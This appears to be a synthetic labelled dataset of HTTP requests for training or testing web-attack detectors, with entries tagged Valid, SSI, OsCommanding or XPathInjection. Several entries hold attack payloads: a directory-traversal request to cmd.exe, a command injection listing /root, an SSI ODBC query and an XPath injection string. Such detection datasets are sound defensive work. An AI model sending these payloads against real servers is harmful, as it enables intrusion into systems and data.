If-Modified-Since: Sat, 05 Nov 05 12:25:49 GMT
If-Unmodified-Since: Tue, 27 Sep 05 10:48:45 GMT
If-Match: "Gkb4lvp9zJvBwhlo@"
If-None-Match: "fWwU9NfMWdKnwSA"
If-Range: Wed, 06 Jul 05 09:00:45 CET
Max-Forwards: 3523
MIME-Version: 9.3
Pragma: otaoAlec='2brn'
Proxy-Authorization: NTLM ZGxpMnplaW4ya2VsZW9mYXRkdExvYmdpY3RjenJvdXN0c3M0M3Q=
Authorization: NTLM VHdvZWRlU3RhY2Vucmh2ZDl5aGllczhsaXJyZW9yaHphc3I=
Range: -158831,4-,452-53031
Referer: http://sdeagnet.gov/ytR6E1nt/oYoooo/i5smcs/Ue5shb.doc
TE: trailers,chunked;q=0.6,gzip;q=0.4
Trailer: Accept-Language
User-Agent: Kntne5qXa/0.5.8
UA-CPU: 68000
UA-Disp: 3488,5746,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0780x902
Via: aIptxi/5.2 www.euCdeie.jpg:3643
Transfer-Encoding: EhAho; idbut=hnEeih
Upgrade: aesjar/3.6
Warning: 115 www.S7ls.gif:1 "aelg9iTbtndhtop1Hiir" 
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 30016266128
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32129
Start - Id: 423
class: Valid
GET /lQI/5atG1D2PiGm3Z0/fdstylezAC/eXki/skTYorKiLHJekajqC/b6oW/akgaeb8smin.htm? HTTP/1.0
Host: 182.126.153.198:80
Connection: keep-alive
Accept: video/mpeg;q=0.2, image/*;q=0.3, text/html;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 168.226.179.89
Cookie: 13iYv6ELR=h
Cookie2: $Version="95"
Date: Sat, 18 Oct 08 09:30:13 UTC
ETag: W/"ZYJ8dLc2S17STj3"
Expect: vtwsoGy=cos23
From: enIsusc@saoftwhhea.net
If-Modified-Since: Tue, 15 Sep 09 15:59:49 UTC
If-Unmodified-Since: Fri, 08 Jul 05 19:04:51 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Aug 05 08:56:22 UTC
Max-Forwards: 4231
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Eiop oaUat=rr1iwqp
Authorization: Basic dHdlZXU6bjZhY1NhOXQ=
Range: 95586-,-851,-5894
Referer: /heunno/hlrpcs/ktf9ltaz/dXetGeE/49n0ai.asp
TE: gzip,trailers,deflate;q=0.6
Trailer: Trailer
User-Agent: tjemho8e3eltotmbwU
UA-CPU: Sparc
UA-Disp: 810,8513,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7545x2141
Via: saht/3.7 www.imy0tpsi.htm, 2.4 110.6.142.59
Transfer-Encoding: gzip
Upgrade: h8v/5.8, rdh/0.4, hph/9.9, 1sOa/3.6, nneh/1.1
Warning: 149 17.234.227.54 "dtnns1r5ttEtxenr" "Tue, 03 Jan 06 20:04:52 GMT"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 12415711781271440816
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 423
Start - Id: 28849
class: Valid
GET /aOkoM/8SnH7eAi.EAGwXrbVqGl/s1k/aqwotsAta8st/sv/aqmi/Msdaehoeoie/a5@h_VU6mR8W9RtHdyb/etKTnPcpf1.htm?nShsdhHnl=%40awindow.opensaccept+eiiehDt3fposition&sstuf=kehTh+%3BidlWallwindow.openhb&u7ttErlaicjql=13408422&r6pm8got=rT+nh&uftp81@G8=%5Dmi%29&ZUAMIgul=replace%28likeTjIuO&4script9g=77&xTed6=dsilirtficsdhrnen&Esbtrwwrledo=7ehOnfwetr&orPjZeXa7a=45751944&binFJincludeoDYqG=%7C8ebinG&UMgj3HvCJ=05 HTTP/1.0
Host: 196.8.24.141:80
Connection: keep-alive
Accept: audio/basic, application/*;q=0.0
Accept-Charset: iso-8859-9, x-mac-japanese;q=0.4, iso-8859-1, windows-1254, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 180.229.35.171
Cookie: rottaoiiaT0qf=4707;ioylpqm=9lrnrEatr2;ceodbenakhOdoNb=215298;ana=4999;budtcuhlel2b=03;rh=et
Cookie2: $Version="01"
Date: Mon, 19 May 08 16:01:46 UTC
ETag: W/"D-LFA3Yi1z1Rsvxri"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Mon, 04 Oct 04 23:36:48 GMT
If-Unmodified-Since: Tue, 13 Apr 10 18:39:10 GMT
If-Match: *
If-None-Match: "tbPhsBaoGT9X8@C"
If-Range: Sat, 01 Dec 07 03:11:44 UTC
Max-Forwards: 926
MIME-Version: 0.3
Pragma: 9Thq9r1='oks4mtae'
Proxy-Authorization: NTLM Mmhzb21iY2FuY2h6aGJpbnZqZWU1cHFmanhkd2psSGduNmRvYXR0ZW51bjQ=
Authorization: eeeae stTE=trhaWn
Range: 69-
Referer: /dRdt/ptaAe0tc.pl
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 1.2; eO-ub; rv:0.1.0) Gecko/55438304
UA-CPU: x86
UA-Disp: 3377,8553,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 122x5513
Via: HTTP/2.0 79.255.74.131, 1.0 www.nniht.jpg
Transfer-Encoding: compress
Upgrade: wQghe/7.0, add/6.9
Warning: 774 www.ndtrlnd.html:61057 "LoxMoewimo" "Wed, 19 Apr 06 19:33:49 UTC"
X-Forwarded-For: 102.241.28.31
X-Serial-Number: 15281
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28849
Start - Id: 2117
class: Valid
GET /1Jaccess_log9S/Wof/84dQQ/5Vq5/ifnq9ute3lHutI.jpeg?ht50erwtalor=a3r&has0Tu=3&ldodbetafe=eSNZal&F5RallZ8iNQLadmin=ttteaztR&rruyohkein7l=PsNyt474fage&hmhi=yl&ab4tHeuqi=roei6ociafsrneit&hlMeio=cmd%29e4t&1tidbgsnetco=trubsneeensj&tsngihtd7u=5104948&sh8sEah44nne=36224&otrritTas=bibtpetsez&sriyos=em-IarT_L8A&dr=9&sthrSmotstLede=6209 HTTP/1.0
Host: www.8f5LfK.de
Connection: close
Accept: text/*, video/*;q=0.4, audio/*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: dMo7cO-cyoei, v6swrXr-lruPs4, tdwis-a5amgtb;q=0.1
Cache-Control: min-fresh=12
Client-ip: 237.9.247.14
Cookie: eHo=853;qieeo8epsi=between;nonBesafxslzrE=7243006
Cookie2: $Version="5"
Date: Sun, 18 Apr 04 13:09:06 UTC
ETag: W/"PkiXyIMVpqvo_R_eDskr"
Expect: aashide
From: n8maf@29wgo01.de
If-Modified-Since: Sat, 08 Dec 07 08:01:14 GMT
If-Unmodified-Since: Tue, 26 Jul 05 09:57:51 CET
If-Match: *
If-None-Match: *
If-Range: "2LGmtzhDlUC3tFE@"
Max-Forwards: 368
MIME-Version: 1.6
Pragma: e=rTemsp
Proxy-Authorization: Digest qop=auth
Authorization: drweoc nre80a=ldaeuO
Range: -93,4514-2
Referer: /psa6/bvaeaue/reGz2i/ztg0g/euEtdtto.jpeg
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/6.5 (X11; U; Unix 3.3; m5-rb; rv:3.6.7) Gecko/41230391
UA-CPU: Sparc
UA-Disp: 4115,383,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 539x1521
Via: 7.3 239.109.228.106
Transfer-Encoding: muqaad
Upgrade: LqnoEm/4.0, 2Odnr/2.0, ioip/3.7, qMe/8.4
Warning: 551 www.azMe.gif "eLopsrhhmd3yte9t3h" 
X-Forwarded-For: 138.19.39.77
X-Serial-Number: 86831
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 2117
Start - Id: 2931
class: Valid
GET /wZ55VesP/7hgyiEioa/FBselect6GzLa@6ZG/iL3G3mJ9HL_1.php3?ok8e=35&4eosty=9252&qi5dclitshw=6t6e0D4ruct&hIohltociig=-1&lm2oatIshwir=%28iylumPhetc-%25jbetween%5Ceoy&2dT6f=oOkaVm&1ezten=vr+is&ure4ehser=htNuypnmaneidvehg&tdmnkR3ra=sreNwldeKimyeiti HTTP/1.1
Host: www.eRNzrhir.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: e5ez-ea, eoTa-e1, eIzteei-rgao, iqi-cGea;q=0.0
Cache-Control: no-store
Client-ip: 169.145.144.163
Cookie: eysinw6i=e0B6iru0bp7b;biscanedc8fhe=chugroup byola
Cookie2: $Version="7"
Date: Tue, 31 May 05 02:57:57 GMT
ETag: "A-367QW-qbH4e9vzMAm"
Expect: 100-continue
From: qg1rhg@3iIi.de
If-Modified-Since: Thu, 29 Nov 07 24:09:22 GMT
If-Unmodified-Since: Fri, 27 Feb 09 23:54:34 UTC
If-Match: "Zh@9Rcw5IgTXQvS"
If-None-Match: "gpQPu9lYc8_ciZo6DNW"
If-Range: *
Max-Forwards: 6663
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=rieTn
Authorization: eofnhI BrtAcekt=rtdsdyru
Range: 65-
Referer: /7oalBna/tSeqoN3/ciAeodt.msf
TE: chunked,deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: lpshthlfwI http://www.teh1.com
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 202x8189
Via: 2.0 www.shco.tiff
Transfer-Encoding: deflate
Upgrade: aqeAe/2.5, uaisaa/2.3
Warning: 530 www.zisn.js "a3sxuae" "Sun, 09 Jul 06 13:08:32 GMT"
X-Forwarded-For: 228.20.165.235
X-Serial-Number: 369098757505343425
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2931
Start - Id: 7874
class: Valid
PUT /awgoDe/kxvnchwinnt1j.tiff? HTTP/1.1
Content-Length: 49
Content-Language: oa5sahyg,huepn,rrtleari
Content-Encoding: identity
Content-Location: /esamtf/aerliti.swf
Content-MD5: czh2c25hYnl5dG9hbEVlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jul 08 18:34:00 CET
Last-Modified: Tue, 12 Jul 05 20:37:19 GMT
Host: www.ioZtnuanno.com
Connection: close
Accept: text/xml, text/*;q=0.6, image/gif
Accept-Charset: iso-8859-8-i, iso-8859-7
Accept-Encoding: identity, gzip, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 36.61.64.56
Cookie: boehotybesm=rU;0krtozlyhno3=7206155310;atbcb4=0043587
Cookie2: $Version="163"
Date: Thu, 02 Mar 06 06:30:04 UTC
ETag: "qktc@.Ia@_iWjay"
Expect: 100-continue
From: Oosa@iedncd.ch
If-Modified-Since: Wed, 29 Nov 06 22:11:26 GMT
If-Unmodified-Since: Wed, 18 Apr 07 07:00:11 CET
If-Match: *
If-None-Match: "PlNLf4T5BQmJu5VqH-"
If-Range: "8UfQ2cmdiN.wXizcvJ"
Max-Forwards: 7694
MIME-Version: 5.8
Pragma: WseHhbt='eeg'
Proxy-Authorization: Digest username="wNlbos"
Authorization: Basic cHRpYTpzaThnY2Vh
Range: 3-90,72191-
Referer: http://dtrnes.com/Efr8/xsnsle/nfrhry.php4
TE: trailers,gzip;q=0.0,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.4 (Machintosh; U; Mac OS X 6.4; ih-ce; rv:9.8.5) Gecko/67208992
UA-CPU: Sparc
UA-Disp: 8149,736,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 078x656
Via: FTP/8.1 www.nQcaneee.htm, 9.9 169.49.93.87
Transfer-Encoding: gzip
Upgrade: zo0jhs/9.3, IJs3au/5.6, dAmeer/2.8
Warning: 457 58.248.149.253 "ghot6raooeReo" 
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 625088294062
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ceiHaydrWoEhf=60&a4xeeaA7rEph=373108&7htrihi=ggyN

End - Id: 7874
Start - Id: 40787
class: SSI
GET /4etrg.bin?gr6ltdesngw9=oiautoexec&ardwsrgIRn=%3C%21--+++%23odbc++statement+%3D++%22select++IE2%2C++n1ne%2C+lne+from+zodNchbR+++++order+by+++1%2C++982%2C+6%22+++++--%3E&arberegpdttm9ne=as2sraEgr&eanetltht0ene=e%29%7EtRttne&eas=903&VGvK0=celrnosamtr&rmlhcdums4dc=5512808&u86pn=ku-pB&iarD=nhh+gvpositionde&eeuhhWrurhnesac=q&LOblN1Fti7A=e%5ClCit&HEeossb=590621411&ftpKfMDvary2=533&zyUqNzoG4script=kijE HTTP/1.0
Host: 185.78.234.120
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: k-Oee, tfp-iftttam, oLpe1-trf
Cache-Control: no-store
Client-ip: 79.174.208.245
Cookie: s35na=elepo
Cookie2: $Version="646"
Date: Tue, 18 Sep 07 14:28:36 GMT
ETag: "vhdrjN37uTj.hbcz4l7"
Expect: 100-continue
From: tram87O@4tnG.de
If-Modified-Since: Sun, 20 Jan 08 13:47:44 CET
If-Unmodified-Since: Thu, 19 Jul 07 14:57:38 CET
If-Match: "sahI6kg4qIt08lNMM"
If-None-Match: "lbw78sU-d-8Q9.v7cFih"
If-Range: Thu, 24 Jun 04 22:51:53 UTC
Max-Forwards: 2
Pragma: xufmene='eHNan'
Proxy-Authorization: Basic bmVoc2o6bDlxb2FsdA==
Authorization: Digest algorithm=MD5
Range: 6294-616374
Referer: /gjye/8cAh4net/oAWwpm/eshm7a/dsHt.gif
TE: trailers,gzip
Trailer: Trailer
User-Agent: rrsoShwht9 (gW4nG2GHE)
UA-Disp: 4103,847,16
UA-OS: Win98
UA-Pixels: 4833x5333
Via: FTP/9.1 www.Ilrsrsti.tiff, amn/6.1 www.neenrna6.htm
Transfer-Encoding: identity
Upgrade: itsch6/1.6
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 095022921
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40787
Start - Id: 33454
class: Valid
PUT /aansheansE4eprQbrh.php3? HTTP/1.1
Content-Length: 30
Content-Language: t,t
Content-Encoding: deflate
Content-Location: http://msEc.st/m4gt/1kaue5T/nIi0c/Olhnu/eldea.jpg
Content-MD5: dHpvM3l0Z3VlYmFXb2VleA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Nov 04 22:21:32 GMT
Last-Modified: Thu, 17 Sep 09 01:43:53 GMT
Host: 114.69.154.93
Connection: tmcaNe
Accept: audio/basic;q=0.4, image/*;q=0.1, application/*;q=0.6
Accept-Charset: utf-7;q=0.2, koi8, iso-8859-6, x-mac-greek
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 130.113.148.234
Cookie: orbeoolweatxoy=1lc8;zbeo=uCuImo3;3d@orXnodecmdD6E=07;mm=310442
Cookie2: $Version="0"
Date: Wed, 04 Apr 07 03:45:52 GMT
ETag: "OBRpOLDexlTKNOercvA"
Expect: 100-continue
From: rypkuF@annazi.gov
If-Modified-Since: Thu, 11 Jun 09 24:20:59 GMT
If-Unmodified-Since: Mon, 08 Nov 04 15:09:41 UTC
If-Match: *
If-None-Match: "9ayKjxiZoMnTTUXnJf"
If-Range: ".grm.hQ2xwqLJHnj"
Max-Forwards: 4276
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic cnRjZW86bnNucmZu
Authorization: Basic dG5zdW9uZDpkTHR0bW82cw==
Range: 749148-4324
Referer: /wimoheii.mpg
TE: gzip,trailers,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/7.8 (X11; U; SunOS sun4u 9.6; uo-2t; rv:1.9.5) Gecko/30078305
UA-CPU: StrongARM
UA-Disp: 2518,5185,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 460x027
Via: FTP/2.4 www.5excf.png, 5.1 142.219.12.243
Transfer-Encoding: identity
Upgrade: 03e5/6.4, leni/2.7
Warning: 657 165.58.231.168 "oeofT8kteyMTk0" 
X-Forwarded-For: 24.33.216.151
X-Serial-Number: 944908095975390
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

mleulsksO2tr=al]dnddSjialH e

End - Id: 33454
Start - Id: 6510
class: Valid
POST /rTiEeacbeqaneemdk/3cvn6dP_RAbEGPMf/tq/0zmtelnetPICRaMj2/@gOBGAIcX6AvQ/s8oreLvfehfehnf/g-9RAGP1jSBL.jsp? HTTP/1.0
Content-Length: 78
Content-Language: hi
Content-Encoding: compress
Content-Location: /8eaeak/sef3ihd.png
Content-MD5: N3Rjc2pjYmM3bGI3b3NJbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Dec 08 06:18:51 UTC
Last-Modified: Sun, 14 Jun 09 08:22:23 CET
Host: 48.150.219.40
Connection: baheoL
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tn-rnhaiso, leWlt-eWsthn;q=0.0, aeehsr9s-qqno, 3-eXneysy, t3d-hsn9at
Cache-Control: esrStrr='ulx3tb'
Client-ip: 197.127.12.143
Cookie: sNiseaws=t] e;eej=nX_sHAeyF;hstnn=oxdny
Cookie2: $Version="278"
Date: Wed, 17 May 06 18:36:37 UTC
ETag: "E0bgkMgp-3.S1fX"
Expect: 100-continue
From: s4epsqsd@rotiihceen.net
If-Modified-Since: Thu, 15 Jul 04 06:59:30 UTC
If-Unmodified-Since: Fri, 29 Apr 05 04:07:14 CET
If-Match: "C6R1M3uPIxXoy0CCv8Th"
If-None-Match: *
If-Range: *
Max-Forwards: 781
MIME-Version: 7.4
Pragma: khrphy=rhnf4t
Proxy-Authorization: NTLM ZXludzZ2cjlvYWVhcTV0S0RjNG9Ud3Nzb2F1b2NuZDc=
Authorization: Digest uri=http://www.rpn0eiin.cz/eedt/ft7o/esRe/e2ite5o.jpg
Range: -0,37191-913541,986937-
Referer: /eailtre/to3vx2n/nweo/jttmn/rNohetu.tiff
TE: deflate,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.6 (X11; U; Open BSD i386 1.6; ip-i9; rv:3.6.7) Gecko/21560341
UA-CPU: x86
UA-Disp: 8394,8208,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 9481x739
Via: FTP/0.9 100.16.29.92:6
Transfer-Encoding: compress
Upgrade: ropcwa/9.2
Warning: 905 www.vuHjLrce.jpeg "bzvewwcnnhcIww" "Sat, 06 Mar 04 23:19:48 UTC"
X-Forwarded-For: 217.19.212.140
X-Serial-Number: 4277371150602
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

rrt=ediYmctarxv&pho9a=appassthru+ee&SG2-rsamOiM=eHCher'rr&7cebMtde2a=te|

End - Id: 6510
Start - Id: 44008
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.t5vg.org:2
Connection: 3o3oe
Accept: image/jpeg, video/mpeg
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 139.195.201.34
Cookie: Aio4rcnv65=cOeydiorh6ibsned;vooasnOeitlRol=s6en4idd2ntdpRmi
Cookie2: $Version="8"
Date: Sat, 01 Jul 06 16:43:09 CET
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: kp4tiinn=evwnas
From: 44fa@mshrPyo.gov
If-Modified-Since: Mon, 12 Jun 06 18:22:47 UTC
If-Unmodified-Since: Fri, 19 Feb 10 02:32:39 CET
If-Match: "@Ks4l7ofmyY2aScABGMH"
If-None-Match: *
If-Range: *
Max-Forwards: 33
MIME-Version: 9.9
Pragma: Pagnot=zgmeo7rn
Proxy-Authorization: Digest opaque="ebymenp"
Authorization: ivn1d wIdh9ti=ee5z
Range: 67-764741,470518-20,3-202913
Referer: /slote9.png
TE: trailers,trailers,chunked
Trailer: Host
User-Agent: iuu.AO http://www.utit.de
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5667x180
Via: 3.9 www.bsiefi7.png, 7.6 www.aldsltE.tiff, FTP/4.6 90.6.139.221
Transfer-Encoding: identity
Upgrade: eeek/4.8, annk1/4.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44008
Start - Id: 29411
class: Valid
GET /sxnOtwsslan6Nithub/7OJ5MQ0axncfwc0/leeiprtitnssrssRnmd/aH8iT1TVTlaPI10oPt/aiH.shtml? HTTP/1.1
Host: 61.59.107.186
Connection: close
Accept: text/html, text/html;q=0.7, image/jpeg
Accept-Charset: utf-8, iso-2022-kr
Accept-Encoding: 
Accept-Language: bra-ints, ATnoeho-xpB, uvwssUMt-eenombce;q=0.8, r7hrinm9-nhoKs
Cache-Control: max-age=170
Client-ip: 178.231.1.172
Cookie: anlx6pctsna=e% ;tfhxrs=araeiows1O;espthote7goS=sr6;_NWMk2=665726;vd8xtsei=eyqtSlyiiEafre
Cookie2: $Version="9"
Date: Thu, 10 May 07 20:33:33 GMT
ETag: W/"j0z6mK8PALDg8T1a"
Expect: iwrv7rt
From: rses@eEtA5.st
If-Modified-Since: Wed, 21 Jan 09 13:16:59 GMT
If-Unmodified-Since: Tue, 12 Apr 05 15:13:20 GMT
If-Match: "O1SzfG1wlNK-eQr4bzk"
If-None-Match: *
If-Range: Wed, 21 Mar 07 17:07:29 GMT
Max-Forwards: 16
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM b25lc2xsYUVLZXNzbGR0b21pZXJ5YTl3YWhvZWVzdHRiaXR5aHFyZ2Rpb2tiYXJ1
Authorization: Digest cnonce="Tr98yrfp"
Range: 28212-
Referer: /qfang/ew0eeEtI/hals/grcvtog.tiff
TE: trailers
Trailer: Range
User-Agent: Mozilla/0.1 (X11; U; Open BSD i586 6.6; is-to; rv:7.7.3) Gecko/81358369
UA-CPU: MIPS
UA-Disp: 2709,267,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 437x5082
Via: gpUarn/1.4 48.242.186.11
Transfer-Encoding: oeiA; zehBawe=1ybhr
Upgrade: r5nsd/8.4, eecerh/9.5
Warning: 637 216.250.224.103 "tew7rd" "Sat, 20 Sep 08 06:41:50 GMT"
X-Forwarded-For: 173.109.21.18
X-Serial-Number: 55211271758
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29411
Start - Id: 49277
class: XPathInjection
GET /leBkt8AThF7dJ3M1Gsr/Eieeancedwlrote4/9PnL@M_ZjwM/rnh.jpg?x6k.4CDXcX=loMsr%27+or++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28++++i+++%2B++++j+%2B+k%2B+l+++%2B1%29%5D+%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+++++%27etg%27%3D++++%27+ae%27+or&utaeoKWanRe=aes&siyofcrhya=35952&UOinclude8k6E2Cm=edmrlWrn&boSFphpWGWj=hveb HTTP/1.1
Host: 215.188.98.137
Connection: 0d0zh
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 135.225.50.169
Cookie: nzr=:ibetweene+
Cookie2: $Version="87"
Date: Wed, 28 Sep 05 05:54:17 UTC
ETag: W/"JPmR9_9ZPrUkFgwSt4"
Expect: es2eh=e4ae6
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sat, 13 Sep 08 22:08:48 UTC
If-Unmodified-Since: Sat, 28 Jul 07 04:59:46 GMT
If-Match: "K2Yn5Nj@JULkEXe"
If-None-Match: "wHnvcYP2A52kht@BYD4P"
If-Range: "0qRPlmkErF2UYwL"
Max-Forwards: 828
MIME-Version: 9.5
Pragma: 3nfvts='i2E'
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: Basic bmRhb25TYkw6Y2U0cg==
Range: 16022-18449
Referer: http://www.auwthtm.com/s5seeRy/nm94tci/yemoUe.conf
TE: gzip,trailers,chunked
Trailer: Trailer
User-Agent: hwsg5d (k-ly4x8Dlr; 0IgU@sw95l; txT17bL)
UA-CPU: x86
UA-Disp: 3091,890,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 666x0440
Via: FTP/9.7 144.243.219.213, oDael/3.5 www.8aQcmS.css
Transfer-Encoding: gzip
Upgrade: iedn/7.3, nh9e/5.6, 2l7Pr/8.1
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49277
Start - Id: 18045
class: Valid
GET /nxlBUNcV/tdEZ/frehram4sldaye/yXtinee7/rtydissjsazafczd4ns/swSmODND/cSj4ZqxivD_dsX.S.js? HTTP/1.1
Host: 154.36.169.81
Connection: keep-alive
Accept: text/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: g-e8, iluefbn-taatngr;q=0.4, dscpeI-esdgd
Cache-Control: max-stale
Client-ip: 152.138.235.120
Cookie: nryhepyh0aq3ero=aetb9driglludr4;cuS=2sdropCd@aOw;dectpezees1id=s1GD9uuFlU
Cookie2: $Version="013"
Date: Wed, 05 May 10 18:20:43 GMT
ETag: W/"C.BEU9uiKu@KDcRH5"
Expect: trten
From: ubo9@noxriwRe.cz
If-Modified-Since: Thu, 19 Mar 09 13:49:43 CET
If-Unmodified-Since: Wed, 01 Jun 05 06:27:11 GMT
If-Match: "ktxf8V@b7srH3rax0.8"
If-None-Match: "eUWXU_MR3wa1W7ijlqTR"
If-Range: *
Max-Forwards: 4
MIME-Version: 6.0
Pragma: qbv1tax=e0sSe
Proxy-Authorization: Digest opaque="aicatet"
Authorization: NTLM bjRzZGx0aHdkaWVoaVJiNm5laW9vdXJkZWxoeWl1dHdoZUV3bW1Ob2NzbGs=
Range: -498682,294755-,-12868
Referer: http://www.jtd8r7i1.org/tnt7uUk8/tig0/rihrtut/pwxaitl.asmx
TE: deflate;q=0.9,gzip,gzip;q=0.0
Trailer: Max-Forwards
User-Agent: Mozilla/6.2 (compatible; MSIE 5.8; Linux i386; mee80Ml; cnwashasrn)
UA-CPU: PowerPC
UA-Disp: 9424,5309,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 258x9628
Via: 3.4 84.14.51.13, FTP/6.5 www.oeAepeHv.shtml, HTTP/6.8 166.89.152.222
Transfer-Encoding: compress
Upgrade: tnau/0.7, Rsss/5.2, lts4/0.6
Warning: 923 136.21.74.55:3970 "tpeOiltiem" 
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 60954
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18045
Start - Id: 43169
class: OsCommanding
GET /c.oUhavingfLqH3htpass-mAK/X2NFk/hipukmpfsQ2a.B/_AYJ3iM3.sh?9adh=m&uu=409&7Hm9U1fqnna8=%5Cnls++++%2Froot%2F&UM6selectl=8&lol7afetmlua=egucceoo&eh57Oyatewhtra=%7Erbsow%3DNrboot.inia1Us HTTP/1.1
Host: www.rdswtuhor.org
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 229.240.5.133
Cookie: avcthwztsEmtNe=mlga3k<s hc[ rCvbscript\olink;xDjaccess_log39-g=S7vtrd;lxIdrou98biah8g=391;jeh=nCOnnc6bdhntwa;awe=885561;ans=sla7mcqps2mn
Cookie2: $Version="045"
Date: Mon, 01 Jan 07 08:46:05 GMT
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: ritelu@ohts9eaeot.uk
If-Modified-Since: Mon, 17 Jul 06 04:42:59 GMT
If-Unmodified-Since: Thu, 20 Jan 05 04:28:41 UTC
If-Match: "bphVQyJDe@l@tGwwww8z"
If-None-Match: "9G-r3zudstkL2b4S"
If-Range: Mon, 03 Jul 06 22:31:31 GMT
Max-Forwards: 063
MIME-Version: 2.9
Pragma: sSIuriea=sdNhel
Proxy-Authorization: Basic OWFyMXVlZDo2cnBobg==
Authorization: Digest nc=Bef4e5bA
Range: 332370-1588,656-95
Referer: /eeeieds/lithr/25aM3l/tntf.wmn
TE: trailers,chunked,trailers
Trailer: If-Match
User-Agent: itle/8.2.0.4.7
UA-CPU: Sparc
UA-Disp: 6178,9185,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 953x846
Via: 7.1 www.ssttlemo.jpeg
Transfer-Encoding: qrcQeh
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

